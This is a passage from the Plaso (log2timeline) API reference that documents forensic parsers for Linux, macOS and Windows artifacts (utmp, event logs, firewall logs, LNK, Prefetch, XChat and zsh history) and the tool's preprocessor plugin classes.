Parser for Linux utmp files. class plaso.parsers.utmp.UtmpEventData Bases: plaso.containers.events.EventData Linux libc6 utmp event data. exit_status exit status. Type int hostname hostname or IP address. Type str ip_address IP address from the connection. Type str

5.1. Subpackages 451 Plaso (log2timeline), Release 20210606

offset offset of the utmp record relative to the start of the file, from which the event data wasextracted. Type int pid process identifier (PID). Type int terminal_identifier inittab identifier. Type int terminal type of terminal. Type str type type of login. Type int username user name. Type str DATA_TYPE = 'linux:utmp:event' class plaso.parsers.utmp.UtmpParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Linux libc6 utmp files. DATA_FORMAT = 'Linux libc6 utmp file' NAME = 'utmp' ParseFileObject(parser_mediator, file_object) Parses an utmp file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed.

452 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.utmpx module

Parser for utmpx files. class plaso.parsers.utmpx.UtmpxMacOSEventData Bases: plaso.containers.events.EventData MacOS utmpx event data. hostname hostname or IP address. Type str offset offset of the utmpx record relative to the start of the file, from which the event data wasextracted. Type int pid process identifier (PID). Type int terminal name of the terminal. Type str terminal_identifier inittab identifier. Type int type type of login. Type int username user name. Type str DATA_TYPE = 'mac:utmpx:event' class plaso.parsers.utmpx.UtmpxParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Mac OS X 10.5 utmpx files. DATA_FORMAT = 'Mac OS X 10.5 utmpx file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'utmpx' ParseFileObject(parser_mediator, file_object) Parses an UTMPX file-like object. Parameters

5.1. Subpackages 453 Plaso (log2timeline), Release 20210606

Parser for vsftpd Logs. class plaso.parsers.vsftpd.VsftpdEventData Bases: plaso.containers.events.EventData vsftpd Log event data. text vsftpd log message. Type str DATA_TYPE = 'vsftpd:log' class plaso.parsers.vsftpd.VsftpdLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses a vsftpd log. DATA_FORMAT = 'vsftpd log file' LINE_STRUCTURES = [('logline', {Group:({{{{{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} W:(0123...)}) SkipTo:(lineEnd)})] NAME = 'vsftpd' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verify that this file is a vsftpd log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool

454 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.parsers.winevt module

Parser for Windows EventLog (EVT) files. class plaso.parsers.winevt.WinEvtParser Bases: plaso.parsers.interface.FileObjectParser Parses Windows EventLog (EVT) files. DATA_FORMAT = 'Windows EventLog (EVT) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'winevt' ParseFileObject(parser_mediator, file_object) Parses a Windows EventLog (EVT) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. class plaso.parsers.winevt.WinEvtRecordEventData Bases: plaso.containers.events.EventData Windows EventLog (EVT) record event data. computer_name computer name stored in the event record. Type str event_category event category. Type int event_identifier event identifier. Type int event_type event type. Type int facility event facility. Type int message_identifier event message identifier. Type int offset offset of the EVT record relative to the start of the file, from which the event data wasextracted.

5.1. Subpackages 455 Plaso (log2timeline), Release 20210606

Type int record_number event record number. Type int recovered True if the record was recovered. Type bool severity event severity. Type int source_name name of the event source. Type str strings event strings. Type list[str] user_sid user security identifier (SID) stored in the event record. Type str DATA_TYPE = 'windows:evt:record' plaso.parsers.winevtx module

Parser for Windows XML EventLog (EVTX) files. class plaso.parsers.winevtx.WinEvtxParser Bases: plaso.parsers.interface.FileObjectParser Parses Windows XML EventLog (EVTX) files. DATA_FORMAT = 'Windows XML EventLog (EVTX) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'winevtx' ParseFileObject(parser_mediator, file_object) Parses a Windows XML EventLog (EVTX) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object.

456 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.parsers.winevtx.WinEvtxRecordEventData Bases: plaso.containers.events.EventData Windows XML EventLog (EVTX) record event data. computer_name computer name stored in the event record. Type str event_identifier event identifier. Type int event_level event level. Type int message_identifier event message identifier. Type int offset offset of the EVTX record relative to the start of the file, from which the event data wasextracted. Type int record_number event record number. Type int recovered True if the record was recovered. Type bool source_name name of the event source. Type str strings event strings. Type list[str] user_sid user security identifier (SID) stored in the event record. Type str xml_string XML representation of the event. Type str DATA_TYPE = 'windows:evtx:record'

5.1. Subpackages 457 Plaso (log2timeline), Release 20210606 plaso.parsers.winfirewall module

Parser for Windows Firewall Log file. class plaso.parsers.winfirewall.WinFirewallEventData Bases: plaso.containers.events.EventData Windows Firewall event data. action action taken. Type str protocol IP protocol. Type str source_ip source IP address. Type str dest_ip destination IP address. Type str source_port TCP or UDP source port. Type int dest_port TCP or UDP destination port. Type int size size of ??? Type int flags TCP flags. Type str tcp_seq TCP sequence number. Type int tcp_ack TCP ACK ??? Type int tcp_win TCP window size ??? Type int icmp_type ICMP type.

458 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int icmp_code ICMP code. Type int info ??? Type str path ??? Type str DATA_TYPE = 'windows:firewall:log_entry' class plaso.parsers.winfirewall.WinFirewallParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses the Windows Firewall Log file. DATA_FORMAT = 'Windows Firewall log file' LINE_STRUCTURES = [('comment', {"#" SkipTo:(LineEnd)}), ('logline', {{{{{{{{{{{{{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}})] NAME = 'winfirewall' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verify that this file is a firewall log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file.

5.1. Subpackages 459 Plaso (log2timeline), Release 20210606

Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.winjob module

Parser for Windows Scheduled Task job files. class plaso.parsers.winjob.WinJobEventData Bases: plaso.containers.events.EventData Windows Scheduled Task event data. application path to job executable. Type str description description of the scheduled task. Type str parameters application command line parameters. Type str trigger_type trigger type. Type int username username that scheduled the task. Type str working_directory working directory of the scheduled task. Type str DATA_TYPE = 'windows:tasks:job' class plaso.parsers.winjob.WinJobParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parse Windows Scheduled Task files for job events. DATA_FORMAT = 'Windows Scheduled Task job (or at-job) file' NAME = 'winjob' ParseFileObject(parser_mediator, file_object) Parses a Windows job file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed.

460 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.winlnk module

Parser for Windows Shortcut (LNK) files. class plaso.parsers.winlnk.WinLnkLinkEventData Bases: plaso.containers.events.EventData Windows Shortcut (LNK) link event data. birth_droid_file_identifier distributed link tracking birth droid file identifier. Type str birth_droid_volume_identifier distributed link tracking birth droid volume identifier. Type str command_line_arguments command line arguments. Type str description description of the linked item. Type str drive_serial_number drive serial number where the linked item resides. Type int drive_type drive type where the linked item resided. Type str droid_file_identifier distributed link tracking droid file identifier. Type str droid_volume_identifier distributed link tracking droid volume identifier. Type str env_var_location environment variables loction. Type str file_attribute_flags file attribute flags of the linked item. Type int file_size size of the linked item. Type int icon_location icon location.

5.1. Subpackages 461 Plaso (log2timeline), Release 20210606

Type str link_target shell item list of the link target. Type str local_path local path of the linked item. Type str network_path local path of the linked item. Type str relative_path relative path. Type str volume_label volume label where the linked item resided. Type str working_directory working directory. Type str DATA_TYPE = 'windows:lnk:link' class plaso.parsers.winlnk.WinLnkParser Bases: plaso.parsers.interface.FileObjectParser Parses Windows Shortcut (LNK) files. DATA_FORMAT = 'Windows Shortcut (LNK) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'lnk' ParseFileLNKFile(parser_mediator, file_object, display_name) Parses a Windows Shortcut (LNK) file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. • display_name (str) – display name. ParseFileObject(parser_mediator, file_object) Parses a Windows Shortcut (LNK) file-like object. Parameters

462 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parser for Windows Prefetch files. class plaso.parsers.winprefetch.WinPrefetchExecutionEventData Bases: plaso.containers.events.EventData Windows Prefetch event data. executable executable filename. Type str format_version format version. Type int mapped_files mapped filenames. Type list[str] number_of_volumes number of volumes. Type int path_hints possible full paths to the executable. Type list[str] prefetch_hash prefetch hash. Type int run_count run count. Type int volume_device_paths volume device paths. Type list[str] volume_serial_numbers volume serial numbers. Type list[int] DATA_TYPE = 'windows:prefetch:execution' class plaso.parsers.winprefetch.WinPrefetchParser Bases: plaso.parsers.interface.FileObjectParser A parser for Windows Prefetch files.

5.1. Subpackages 463 Plaso (log2timeline), Release 20210606

DATA_FORMAT = 'Windows Prefetch File (PF)' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'prefetch' ParseFileObject(parser_mediator, file_object) Parses a Windows Prefetch file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. plaso.parsers.winreg_parser module

Parser for Windows NT Registry (REGF) files. class plaso.parsers.winreg_parser.WinRegistryParser Bases: plaso.parsers.interface.FileObjectParser Parses Windows NT Registry (REGF) files. DATA_FORMAT = 'Windows NT Registry (REGF) file' classmethod GetFormatSpecification() Retrieves the format specification. NAME = 'winreg' ParseFileObject(parser_mediator, file_object) Parses a Windows Registry file-like object. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_object (dfvfs.FileIO) – a file-like object. plaso.parsers.winrestore module

Parser for Windows Restore Point (rp.log) files. class plaso.parsers.winrestore.RestorePointEventData Bases: plaso.containers.events.EventData Windows Restore Point event data. description description. Type str restore_point_event_type restore point event type. Type str

464 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

restore_point_type restore point type. Type str sequence_number sequence number. Type str DATA_TYPE = 'windows:restore_point:info' class plaso.parsers.winrestore.RestorePointLogParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper A parser for Windows Restore Point (rp.log) files. DATA_FORMAT = 'Windows Restore Point log (rp.log) file' FILTERS = frozenset({}) NAME = 'rplog' ParseFileObject(parser_mediator, file_object) Parses a Windows Restore Point (rp.log) log file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.xchatlog module

This file contains XChat log file parser in plaso. Information updated 24 July 2013. The parser applies to XChat log files. Despite their apparent simplicity it’s not straightforward to manage every possible case. XChat tool allows users to specify how timestamp will be encoded (using the strftime function), by letting them to specify additional separators. This parser will accept only the simplest default English form of an XChat log file, as the following: **** BEGIN LOGGING AT Mon Dec 31 21:11:55 2001 dec 31 21:11:55 --> You are now talking on #gugle dec 31 21:11:55 --- Topic for #gugle is plaso, nobody knows what it means dec 31 21:11:55 Topic for #gugle set by Kristinn dec 31 21:11:55 --- Joachim gives voice to fpi dec 31 21:11:55 * XChat here dec 31 21:11:58 ola plas-ing guys! dec 31 21:12:00 ftw!

It could be managed the missing month/day case too, by extracting the month/day information from the header. But the parser logic would become intricate, since it would need to manage day transition, chat lines crossing the midnight. From there derives the last day of the year bug, since the parser will not manage that transition.

5.1. Subpackages 465 Plaso (log2timeline), Release 20210606

Moreover the strftime is locale-dependent, so month names, footer and headers can change, even inside the same log file. Being said that, the following will be the main logic used to parse the log files (note that thefirstheader must be ‘**** BEGIN ...’ otherwise file will be skipped). 1) Check for ‘****’ 1.1) If ‘BEGIN LOGGING AT’ (English) 1.1.1) Extract the YEAR 1.1.2) Generate new event start logging 1.1.3) set parsing = True 1.2) If ‘END LOGGING’ 1.2.1) If parsing, set parsing=False 1.2.2) If not parsing, log debug 1.2.3) Generate new event end logging 1.3) If not BEGIN|END we are facing a different language and we don’t now which language! If parsing is True, set parsing=False and log debug 2) Not ‘****’ so we are parsing a line 2.1) If parsing = True, try to parse line and generate event 2.2) If parsing = False, skip until next good header is found References http://xchat.org class plaso.parsers.xchatlog.XChatLogEventData Bases: plaso.containers.events.EventData XChat Log event data. nickname nickname. Type str text text sent by nickname or other text (server, messages, etc.). Type str DATA_TYPE = 'xchat:log:line' class plaso.parsers.xchatlog.XChatLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parse XChat log files. DATA_FORMAT = 'XChat log file' LINE_STRUCTURES = [('logline', {{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) [quoted string, starting with < ending with >]} SkipTo:(lineEnd)}), ('header', {{Suppress:("****") Group:({{W:(0123...) W:(0123...)} W:(0123...)})} Group:({{{{Group:({{{{{{"Sun" | "Mon"} | "Tue"} | "Wed"} | "Thu"} | "Fri"} | "Sat"}) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} W:(0123...)})}), ('header_signature', "****")] NAME = 'xchatlog' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verify that this file is a XChat log file. Parameters

466 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.xchatscrollback module

This file contains XChat scrollback log file parser inplaso. Information updated 06 September 2013. Besides the logging capability, the XChat IRC client has the option to record the text for opened tabs. So, when rejoining a particular channel and/or a particular conversation, XChat will display the last messages exchanged. This artifact could be present, if not disabled, even if normal logging is disabled. From the XChat FAQ (http://xchat.org/faq): Q: ‘How do I keep text from previous sessions from being displayed when I join a channel?’ R: ‘Starting in XChat 2.8.4, XChat implemented the Scrollback feature which displays text from the last time you had a particular tab open. To disable this setting for all channels, Go to Settings -> Preferences -> Logging and uncheck Display scrollback from previous session. In XChat 2.8.6, XChat implemented both Per Channel Logging, and Per Channel Scrollbacks. If you are on 2.8.6 or newer, you can disable loading scrollback for just one particular tab name by right clicking on the tab name, selecting Settings, and then unchecking Reload scrollback’ The log file format differs from logging format, but it’s quite simple ‘T 1232315916 Python interface unloaded’ < > The time reported in the log is the number of seconds since January 1, 1970 00:00:00 UTC (from source code, time(0)). The part could contain some ‘decorators’ (bold, underline, colors indication, etc.), so the parser should strip those control fields. References http://xchat.org class plaso.parsers.xchatscrollback.XChatScrollbackEventData Bases: plaso.containers.events.EventData XChat Scrollback line event data. nickname nickname. Type str text text sent by nickname service messages. Type str DATA_TYPE = 'xchat:scrollback:line' class plaso.parsers.xchatscrollback.XChatScrollbackParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses XChat scrollback log files. DATA_FORMAT = 'XChat scrollback log file' LINE_STRUCTURES = [('logline', {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)})] LOG_LINE = {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)}

5.1. Subpackages 467 Plaso (log2timeline), Release 20210606

MSG_ENTRY = {[{{"<" SkipTo:(">")} ">"}] SkipTo:(LineEnd)} MSG_ENTRY_NICK = [{{"<" SkipTo:(">")} ">"}] MSG_ENTRY_TEXT = SkipTo:(LineEnd) MSG_NICK = SkipTo:(">") MSG_NICK_END = ">" MSG_NICK_START = "<" NAME = 'xchatscrollback' ParseRecord(parser_mediator, key, structure) Parses a log record structure. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure parsed from the log file. STRIPPER = {Suppress:(W:(, 0123...)) | Suppress:(W:(...))} VerifyStructure(parser_mediator, line) Verify that this file is a XChat scrollback log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line was successfully parsed. Return type bool plaso.parsers.zsh_extended_history module

Parser for ZSH extended_history files. The file format is described here: http://zsh.sourceforge.net/Doc/Release/Options.html#index-EXTENDEDHISTORY class plaso.parsers.zsh_extended_history.ZshExtendedHistoryParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parser for ZSH extended history files DATA_FORMAT = 'ZSH extended history file' LINE_STRUCTURES = [('command', {{{{{{":" W:(0123...)} ":"} W:(0123...)} ";"} Re:('.+?(?=($|\\n:\\s\\d+:\\d+;))')} LineEnd})] NAME = 'zsh_extended_history' ParseRecord(parser_mediator, key, structure) Parses a record and produces a ZSH history event. Parameters

468 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – structure parsed from the log file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verifies whether content corresponds to a ZSH extended_history file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if the line was successfully parsed. Return type bool class plaso.parsers.zsh_extended_history.ZshHistoryEventData Bases: plaso.containers.events.EventData ZSH history event data. command command that was run. Type str elapsed_seconds number of seconds that the command took to execute. Type int DATA_TYPE = 'shell:zsh:history'

Module contents

This file imports Python modules that register parsers.

5.1.12 plaso.preprocessors package

Submodules plaso.preprocessors.interface module

This file contains classes used for preprocessing in plaso. class plaso.preprocessors.interface.ArtifactPreprocessorPlugin Bases: object The artifact preprocessor plugin interface. The artifact preprocessor determines preprocessing attributes based on an artifact definition defined by ARTI- FACT_DEFINITION_NAME. ARTIFACT_DEFINITION_NAME = None

5.1. Subpackages 469 Plaso (log2timeline), Release 20210606

class plaso.preprocessors.interface.FileArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin File artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file artifact definition, such as file or path. class plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin File entry artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file entry artifact definition, such as file or path. class plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin File system artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a file system artifact definition, such as file or path. Collect(mediator, artifact_definition, searcher, file_system) Collects values using a file artifact definition. Parameters • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. • artifact_definition (artifacts.ArtifactDefinition) – artifact definition. • searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system. • file_system (dfvfs.FileSystem) – file system to be preprocessed. Raises PreProcessFail – if the preprocessing fails. class plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin Bases: object The knowledge base preprocessor plugin interface. The knowledge base preprocessor determines preprocessing attributes based on other values in the knowledge base. abstract Collect(mediator) Collects values from the knowledge base. Parameters mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. Raises PreProcessFail – if the preprocessing fails. class plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin Windows Registry key artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a Windows Registry artifact definition, such as Win- dows Registry key or value. Collect(mediator, artifact_definition, searcher) Collects values using a Windows Registry value artifact definition. Parameters

470 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. • artifact_definition (artifacts.ArtifactDefinition) – artifact definition. • searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry. Raises PreProcessFail – if the Windows Registry key or value cannot be read. class plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin Windows Registry value artifact preprocessor plugin interface. Shared functionality for preprocessing attributes based on a Windows Registry value artifact definition.

plaso.preprocessors.linux module

This file contains preprocessors for Linux. class plaso.preprocessors.linux.LinuxDistributionPlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux distribution plugin. ARTIFACT_DEFINITION_NAME = 'LinuxDistributionRelease' class plaso.preprocessors.linux.LinuxHostnamePlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux hostname plugin. ARTIFACT_DEFINITION_NAME = 'LinuxHostnameFile' class plaso.preprocessors.linux.LinuxIssueFilePlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux issue file plugin. ARTIFACT_DEFINITION_NAME = 'LinuxIssueFile' class plaso.preprocessors.linux.LinuxStandardBaseReleasePlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux standard base (LSB) release plugin. ARTIFACT_DEFINITION_NAME = 'LinuxLSBRelease' class plaso.preprocessors.linux.LinuxSystemdOperatingSystemPlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux systemd operating system release plugin. ARTIFACT_DEFINITION_NAME = 'LinuxSystemdOSRelease' class plaso.preprocessors.linux.LinuxTimeZonePlugin Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin Linux time zone plugin. ARTIFACT_DEFINITION_NAME = 'LinuxLocalTime'

5.1. Subpackages 471 Plaso (log2timeline), Release 20210606 class plaso.preprocessors.linux.LinuxUserAccountsPlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin The Linux user accounts plugin. ARTIFACT_DEFINITION_NAME = 'LinuxPasswdFile' plaso.preprocessors.logger module

The preprocessors sub module logger. plaso.preprocessors.macos module

This file contains preprocessors for MacOS. class plaso.preprocessors.macos.MacOSHostnamePlugin Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin MacOS hostname plugin. ARTIFACT_DEFINITION_NAME = 'MacOSSystemConfigurationPreferencesPlistFile' class plaso.preprocessors.macos.MacOSKeyboardLayoutPlugin Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin MacOS keyboard layout plugin. ARTIFACT_DEFINITION_NAME = 'MacOSKeyboardLayoutPlistFile' class plaso.preprocessors.macos.MacOSSystemVersionPlugin Bases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin MacOS system version information plugin. ARTIFACT_DEFINITION_NAME = 'MacOSSystemVersionPlistFile' class plaso.preprocessors.macos.MacOSTimeZonePlugin Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin MacOS time zone plugin. ARTIFACT_DEFINITION_NAME = 'MacOSLocalTime' class plaso.preprocessors.macos.MacOSUserAccountsPlugin Bases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin MacOS user accounts plugin. ARTIFACT_DEFINITION_NAME = 'MacOSUserPasswordHashesPlistFiles' class plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin Bases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin Plist file artifact preprocessor plugin interface. Retrieves values from a plist file artifact using names of keys defined in _PLIST_KEYS.

472 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.preprocessors.manager module

The preprocess plugins manager. class plaso.preprocessors.manager.FileSystemWinRegistryFileReader(*args: Any, **kwargs: Any) Bases: dfwinreg.interface. A file system-based Windows Registry file reader. Open(path, ascii_codepage='cp1252') Opens the Windows Registry file specified by the path. Parameters • path (str) – path of the Windows Registry file. • ascii_codepage (Optional[str]) – ASCII string codepage. Returns Windows Registry file or None. Return type WinRegistryFile class plaso.preprocessors.manager.PreprocessPluginsManager Bases: object Preprocess plugins manager. classmethod CollectFromFileSystem(artifacts_registry, mediator, searcher, file_system) Collects values from Windows Registry values. Parameters • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry. • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. • searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess the file system. • file_system (dfvfs.FileSystem) – file system to be preprocessed. classmethod CollectFromKnowledgeBase(mediator) Collects values from knowledge base values. Parameters mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. classmethod CollectFromWindowsRegistry(artifacts_registry, mediator, searcher) Collects values from Windows Registry values. Parameters • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry. • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. • searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher to preprocess the Windows Registry. classmethod DeregisterPlugin(plugin_class) Deregisters an preprocess plugin class.

5.1. Subpackages 473 Plaso (log2timeline), Release 20210606

Parameters plugin_class (type) – preprocess plugin class. Raises • KeyError – if plugin class is not set for the corresponding name. • TypeError – if the source type of the plugin class is not supported. classmethod GetNames() Retrieves the names of the registered artifact definitions. Returns registered artifact definitions names. Return type list[str] classmethod RegisterPlugin(plugin_class) Registers an preprocess plugin class. Parameters plugin_class (type) – preprocess plugin class. Raises • KeyError – if plugin class is already set for the corresponding name. • TypeError – if the source type of the plugin class is not supported. classmethod RegisterPlugins(plugin_classes) Registers preprocess plugin classes. Parameters plugin_classes (list[type]) – preprocess plugin classes. Raises KeyError – if plugin class is already set for the corresponding name. classmethod RunPlugins(artifacts_registry, file_system, mount_point, mediator) Runs the preprocessing plugins. Parameters • artifacts_registry (artifacts.ArtifactDefinitionsRegistry) – artifacts definitions registry. • file_system (dfvfs.FileSystem) – file system to be preprocessed. • mount_point (dfvfs.PathSpec) – mount point path specification that refers to the base location of the file system. • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base. plaso.preprocessors.mediator module

The preprocess mediator. class plaso.preprocessors.mediator.PreprocessMediator(session, storage_writer, knowledge_base) Bases: object Preprocess mediator. AddTimeZoneInformation(time_zone_artifact) Adds a time zone defined by the operating system. Parameters time_zone_artifact (TimeZoneArtifact) – time zone artifact. Raises KeyError – if the time zone already exists.

474 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

AddUserAccount(user_account) Adds an user account. Parameters user_account (UserAccountArtifact) – user account artifact. Raises KeyError – if the user account already exists. AddWindowsEventLogProvider(windows_eventlog_provider) Adds a Windows Event Log provider. Parameters windows_eventlog_provider (WindowsEventLogProviderArtifact) – Win- dows Event Log provider. Raises KeyError – if the Windows Event Log provider already exists. ProducePreprocessingWarning(plugin_name, message) Produces a preprocessing warning. Parameters • plugin_name (str) – name of the preprocess plugin. • message (str) – message of the warning. SetFileEntry(file_entry) Sets the active file entry. Parameters file_entry (dfvfs.FileEntry) – file entry. property knowledge_base knowledge base. Type KnowledgeBase plaso.preprocessors.windows module

